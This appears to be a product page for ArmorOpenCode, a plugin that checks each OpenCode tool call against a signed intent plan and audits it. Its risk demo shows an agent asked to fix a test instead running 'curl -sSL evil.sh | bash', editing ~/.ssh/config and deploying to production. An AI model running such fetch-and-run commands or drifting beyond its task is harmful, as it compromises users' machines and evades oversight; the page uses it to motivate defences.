ARMORIQ
// OPENCODE · PLUGIN

ArmorOpenCode

Intent-based security enforcement for OpenCode.

Every tool call OpenCode makes is checked against the plan it declared. Enforced inside OpenCode's plugin layer. No code changes required.

View on GitHub
// one-line install$ curl -fsSL https://armoriq.ai/install_armoropencode.sh | bash
// THE_RISK

OpenCode acts faster than you can review

OpenCode is a terminal-native coding agent. In one session it can edit files, run shell commands, spawn subagents, and call MCP servers, with no record of why each step was taken.

ArmorOpenCode runs as an OpenCode plugin and requires the agent to register a structured intent plan before any side-effecting tool runs. Calls outside the plan are blocked in enforce mode.

Same prompt. No supervision. Quiet drift.

  1. $ opencode
  2. > "Fix the failing test in api/retry.test.ts"
  3. ✓ bash npm test
  4. ✓ bash curl -sSL evil.sh | bash
  5. ✓ edit ~/.ssh/config
  6. ✓ task subagent: deploy to prod
  7. ✓ github_create_pull_request
  8. # session ends · no audit · no trail

Toggle cycles every 6s. Hover to hold.

// THE_SOLUTION

OpenCode proposes. ArmorOpenCode approves.

ArmorOpenCode binds every tool call to a signed intent plan.

Before OpenCode acts, ArmorOpenCode makes it declare what it intends to do. Every call is checked against that declaration. Drift gets denied. The audit trail writes itself.

// HOW_IT_WORKS
01// DECLARE

Intent directive injected

On the first user message, a directive tells OpenCode to call register_intent_plan. The plan is minted into a signed intent token once per plan.

02// VERIFY

Every tool call checked

Before each call: built-in rules, then policy, then the plan and token. All of it in memory, so the check adds microseconds.

03// AUDIT

Every decision audited

Allowed, blocked and held calls are written to a local outbox and shipped to ArmorIQ, including the denies.

// FOUR_BLOCKSwhat gets stopped
  1. 01

    Every tool call gated

    Built-in, plugin, MCP and task tools are checked against the declared plan before they run.

    // tool.execute.beforeBLOCKED
  2. 02

    Subagents inherit the plan

    A task subagent is checked against its root session's plan and token, never a wider one of its own.

    // task · child sessionSCOPED
  3. 03

    The agent cannot touch the guard

    Built-in rules deny reads and writes under ~/.armoriq, and a policy is swapped in only after it parses and verifies.

    // built-in rulesPROTECTED
  4. 04

    Fail-closed on plan absence

    If OpenCode never registers a plan, side-effecting tools are denied in enforce mode.

    // any toolFAIL-CLOSED
4
Plugin toolsintent + trust
µs
Per-call checkin-process
All
Tools gatedbuilt-in, MCP, task
// INSTALL

Get started in minutes

// one-line installInstall with one command
install_armoropencode.sh// step 02
$ 
// alternativeTo remove it:
curl -fsSL https://armoriq.ai/uninstall_armoropencode.sh | bash
  1. // step 01

    Check requirements

    You need OpenCode on macOS or Linux, plus curl. The installer handles the rest.

    opencode --version
    curl --version
  2. // step 03

    Run OpenCode

    Start OpenCode in any project. ArmorOpenCode loads with it and asks the agent to register a plan on your first message.

    cd your-project
    opencode
  3. // step 04

    See it in ArmorIQ

    Audit rows, intent plans and token usage appear in the ArmorIQ console for your account.

    open https://platform.armoriq.ai
// DEEP_DIVE

Hooks, tools & installer reference

Click any row to expand. Every setting, command, and hook is documented here.

Three OpenCode plugin hooks, running in the agent's own process. Decisions are made in memory and audited asynchronously.

chat.message01

Intent directive injected

On a session's first user message, a directive asks OpenCode to call register_intent_plan before acting.

tool.execute.before02

Every tool call checked

Built-in rules, policy, then plan and token. A deny throws, so OpenCode sees a tool error and the call never runs.

tool.execute.after03

Result audited

Each successful call becomes a sanitized audit row. Failures and denies are audited too.

task04

Subagents scoped

Child sessions are checked against the root session's plan and token, and cannot widen it.

// EXECUTION_FLOW · 3 hooks · 3 phasesread top to bottom
// DECLAREUSER PROMPTuser inputchat.messagehookIntent plan capturedregister_intent_planSigned tokenEd25519 · TTL 3600s// VERIFYTOOL CALLopencode proposestool.execute.beforehookPolicy checkdeny / allowIntent verifydrift → BLOCKED// AUDITTOOL RESULTexecuted actiontool.execute.afterhookAudit logsigned JWTArmorIQ IAPtamper-evident
OPENCODE · PLUGIN

Ready to govern your OpenCode sessions?

Connect to ArmorIQ to add signed intent tokens, audit trails, and policy to every tool call OpenCode makes.